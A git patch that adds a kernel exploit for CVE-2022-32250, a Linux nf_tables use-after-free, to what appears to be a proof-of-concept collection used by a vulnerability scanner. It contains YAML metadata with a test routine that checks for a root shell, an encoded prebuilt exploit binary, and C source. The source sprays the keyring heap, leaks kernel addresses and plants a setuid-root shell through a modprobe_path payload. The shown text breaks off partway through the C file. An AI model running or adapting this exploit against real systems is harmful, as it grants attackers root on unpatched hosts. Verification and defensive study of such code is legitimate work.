From f56159c152372491d87780bfeb26954e2d7f9a91 Mon Sep 17 00:00:00 2001 From: zhangzhijintong Date: Fri, 10 Mar 2023 20:56:14 +0800 Subject: [PATCH 1/2] add CVE-2022-32250 --- .../CVE-2022-32250/CVE-2022-32250.yaml | 67 ++ data/KernelPocs/CVE-2022-32250/exp | Bin 0 -> 36752 bytes data/KernelPocs/CVE-2022-32250/exp.c | 712 ++++++++++++++++++ 3 files changed, 779 insertions(+) create mode 100644 data/KernelPocs/CVE-2022-32250/CVE-2022-32250.yaml create mode 100755 data/KernelPocs/CVE-2022-32250/exp create mode 100644 data/KernelPocs/CVE-2022-32250/exp.c diff --git a/data/KernelPocs/CVE-2022-32250/CVE-2022-32250.yaml b/data/KernelPocs/CVE-2022-32250/CVE-2022-32250.yaml new file mode 100644 index 0000000..e5a5e49 --- /dev/null +++ b/data/KernelPocs/CVE-2022-32250/CVE-2022-32250.yaml @@ -0,0 +1,67 @@ +FormatVer: 20220602 +Id: CVE-2022-32250 +Belong: kernel +PocHazardLevel: high +Source: https://github.com/theori-io/CVE-2022-32250-exploit +SiteInfo: + Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + Severity: high + Description: + Linux kernel 5.18.1版本及之前版本存在安全漏洞,该漏洞源于net/netfilter/nf_tables_api.c允许本地用户将权限升级为root用户,攻击者利用该漏洞可导致释放后重用。 + ScopeOfInfluence: + kernel(<=5.18.1s) + References: + - https://www.openwall.com/lists/oss-security/2022/05/31/1 + - https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/net/netfilter?id=520778042ccca019f3ffa136dd0ca565c486cedd + - http://www.openwall.com/lists/oss-security/2022/06/03/1 + - http://www.openwall.com/lists/oss-security/2022/06/04/1 + - https://www.debian.org/security/2022/dsa-5161 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIZTJOJCVVEJVOQSCHE6IJQKMPISHQ5L/ + - https://bugzilla.redhat.com/show_bug.cgi?id=2092427 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MO6Y3TC4WUUNKRP7OQA26OVTZTPCS6F2/ + - http://www.openwall.com/lists/oss-security/2022/06/20/1 + - https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html + - http://www.openwall.com/lists/oss-security/2022/07/03/6 + - http://www.openwall.com/lists/oss-security/2022/07/03/5 + - https://www.debian.org/security/2022/dsa-5173 + - https://security.netapp.com/advisory/ntap-20220715-0005/ + - http://www.openwall.com/lists/oss-security/2022/08/25/1 + - https://github.com/theori-io/CVE-2022-32250-exploit + - https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ + - http://www.openwall.com/lists/oss-security/2022/09/02/9 + SiteClassification: + CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + CvssScore: 7.8 + CveId: CVE-2022-32250 + CweId: CWE-416 + CnvdId: None + KveId: None + Tags: + - 权限提升 + - cve2022 + - 释放后使用 +SiteRequests: + Implement: + ImArray: + - inter: + InterArgs : + Exec : exp + Args : + ExpireTime: 30 #second + + # < input + # > output + # . wait + # ? condition + # : content + # + #组合起来 + # >. 等待直到输出 + # << 输入字符 + # >?判断条件 + Inter: + - ">.:I am root" #等待输出 + - "<<:whoami" #输入'whoami\n' + - ">.:\n" #等待输出'\n' + - ">?:root" #判断输出为'root'为成功 + Condition: None diff --git a/data/KernelPocs/CVE-2022-32250/exp b/data/KernelPocs/CVE-2022-32250/exp new file mode 100755 index 0000000000000000000000000000000000000000..7f7a8937baa971bc106713baf156f737f0ce2f6b GIT binary patch literal 36752 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 QX@on!AhB~j3Lez@pT534(EtDd literal 0 HcmV?d00001 diff --git a/data/KernelPocs/CVE-2022-32250/exp.c b/data/KernelPocs/CVE-2022-32250/exp.c new file mode 100644 index 0000000..2a8c53e --- /dev/null +++ b/data/KernelPocs/CVE-2022-32250/exp.c @@ -0,0 +1,712 @@ +// gcc exp.c -o exp -l mnl -l nftnl -w +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MQUEUE_NUM 5 + + +#define INBOUND 0 +#define OUTBOUND 1 +#define DESC_MAX 0x800 + +#define BUFFER 0x100 +#define NAMELEN 0x100 +#define ERROR_PREFIX "err: " + +#define KEY_DESC_MAX_SIZE 40 + +#define PREFIX_BUF_LEN 16 +#define RCU_HEAD_LEN 16 + +#define SPRAY_KEY_SIZE 50 + +#define PHYSMAP_MASK 0xffffffff00000000 + +#define SPRAY_SIZE 1000 + +#define SPRAY_NB_ENTRIES 10 + +uint64_t base_base; +uint64_t heap_base; +uint64_t modprobe_addr; + +enum nft_trans_phase { + NFT_TRANS_PREPARE, + NFT_TRANS_ABORT, + NFT_TRANS_COMMIT, + NFT_TRANS_RELEASE +}; + +typedef struct +{ + long mtype; + char mtext[1]; +}msg; + +typedef struct +{ + void *ll_next; + void *ll_prev; + long m_type; + size_t m_ts; + void *next; + void *security; +}msg_header; + +typedef struct +{ + char name[BUFFER]; +} Msg; + +typedef struct +{ + char iface[16]; + char name[16]; + char ip[16]; + char netmask[16]; + uint8_t idx; + uint8_t type; + uint16_t proto; + uint16_t port; + uint8_t action; + char desc[DESC_MAX]; +} user_rule_t; + + +struct keyring_payload { + uint8_t prefix[PREFIX_BUF_LEN]; + uint8_t rcu_buf[RCU_HEAD_LEN]; + unsigned short len; +}; + +struct leak { + long kaslr_base; + long physmap_base; +}; + +struct fd_uring { + int fd; + struct io_uring_params *params; +}; + +typedef int32_t key_serial_t; + +const char priv_file[] = "/tmp/shell.c\0"; +const char dummy_file[] = "/tmp/dummy\0"; + +const char priv_context[] = "#include \n#include \n#include \n\nint main(int argc, char **argv){if (geteuid() == 0){setuid(0);setgid(0);puts(\"[+] I am root\");system(\"bash\");}}\x00"; +const char dummy_content[] = "\xff\xff\xff\xff"; +const char new_modprobe_content[] = "#!/bin/bash\n\nchown root:root /tmp/shell\nchmod 4555 /tmp/shell\n"; + + + +static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5); +} + +void bye(char *info) +{ + puts(info); + exit(-2); +} + +void do_error_exit(char *info) +{ + puts(info); + exit(-1); +} + +void bye2(char *info, char *arg) +{ + printf(info, arg); +} + +key_serial_t *spray_keyring(uint32_t start, uint32_t spray_size) { + + char key_desc[KEY_DESC_MAX_SIZE]; + key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t)); + + if (id_buffer == NULL) + bye("calloc"); + + for (uint32_t i = start; i < start+spray_size; i++) { + snprintf(key_desc, KEY_DESC_MAX_SIZE, "SPRAY-RING-%03du", i); + id_buffer[i] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING); + if (id_buffer[i] < 0) + bye("add_key"); + } + + return id_buffer; +} + +key_serial_t *spray_keyring_list_del_purpose(uint32_t spray_size, uint64_t next, uint64_t prev, uint64_t size) +{ + // next[0x8] = prev, prev[0x0] = next allocation occured at gather mqueue + char key_desc[KEY_DESC_MAX_SIZE]; + key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t)); + + char temp[0x20]; + memcpy(temp+0x0, &next, 8); + memcpy(temp+0x8, &prev, 8); + memcpy(temp+0x10, "12341234", 8); + memcpy(temp+0x18, &size, 8); + + if (id_buffer == NULL) + do_error_exit("calloc"); + + for (uint32_t i = 0; i < spray_size; i++) { + id_buffer[i] = add_key("user", temp, temp, 0x20, KEY_SPEC_PROCESS_KEYRING); + if (id_buffer[i] < 0) + do_error_exit("add_key"); + } + + return id_buffer; +} + +key_serial_t *spray_keyring_list_overwrite_purpose(uint32_t spray_size, uint64_t len, uint64_t off_18, + uint64_t off_20, uint64_t off_28, uint64_t off_30, uint64_t off_38) +{ + char key_desc[KEY_DESC_MAX_SIZE]; + key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t)); + + char temp[0x40]; + switch((len-1)/8) + { + case 0: + memcpy(temp+0x0, &off_18, 8); + case 1: + memcpy(temp+0x8, &off_20, 8); + case 2: + memcpy(temp+0x10, &off_28, 8); + case 3: + memcpy(temp+0x18, &off_30, 8); + case 4: + memcpy(temp+0x20, &off_38, 8); + break; + default: + bye("add_key - assert(len <= 0x28)"); + } + + for (uint32_t i = 0; i < spray_size; i++) { + snprintf(key_desc, KEY_DESC_MAX_SIZE, temp); + id_buffer[i] = add_key("user", temp, temp, len, KEY_SPEC_PROCESS_KEYRING); + if (id_buffer[i] < 0) + do_error_exit("add_key"); + } + + return id_buffer; +} + +int get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size) { + + uint8_t buffer[USHRT_MAX] = {0}; + int32_t keylen; + + for (uint32_t i = 0; i < id_buffer_size; i++) { + + keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, 0x10, 0); + if (keylen < 0) + bye("keyctl"); + + if(!strncmp(&buffer[6],"\xff\xff", 2)) + { + heap_base = *((uint64_t*)buffer); + printf("[+] leak successed, kmalloc-64 heap: 0x%llx\n", heap_base); + return i; + } + else + printf("[-] leak failed, idkval: %s\n", buffer); + } + return id_buffer_size; +} + +void awake_partial_keys(key_serial_t *id_buffer, uint32_t idx) { + uint8_t buffer[USHRT_MAX] = {0}; + int32_t keylen; + keylen = keyctl(KEYCTL_UPDATE, id_buffer[idx], (long)buffer, 0x10, 0); +} + + + +void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size) +{ + + for (uint32_t i = 0; i < id_buffer_size; i++) { + if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0) + do_error_exit("keyctl(KEYCTL_REVOKE)"); + } + + free(id_buffer); +} + +void release_partial_keys(key_serial_t *id_buffer, int i) +{ + if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0) + do_error_exit("keyctl(KEYCTL_REVOKE)"); +} + + +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + + unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); + + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + + return; +} + + +void set_stable_table_and_set(struct mnl_socket* nl, const char *name) +{ + char * table_name = name; + char * set_name = NULL; + uint8_t family = NFPROTO_IPV4; + uint32_t set_id = 1; + + // a table for the sets to be associated with + struct nftnl_table * table = nftnl_table_alloc(); + nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name); + nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0); + + struct nftnl_set * set_stable = nftnl_set_alloc(); + set_name = "set_stable"; + nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, 1); + nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(set_stable, NFTNL_SET_ID, set_id++); + + // expressions + struct nftnl_expr * exprs[128]; + int exprid = 0; + + // serialize + char buf[MNL_SOCKET_BUFFER_SIZE*2]; + + struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + int seq = 0; + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + struct nlmsghdr * nlh; + int table_seq = seq; + + nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), +NFT_MSG_NEWTABLE, family, NLM_F_CREATE|NLM_F_ACK, seq++); + nftnl_table_nlmsg_build_payload(nlh, table); + mnl_nlmsg_batch_next(batch); + + // add set_stable + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE|NLM_F_ACK, seq++); + nftnl_set_nlmsg_build_payload(nlh, set_stable); + nftnl_set_free(set_stable); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + 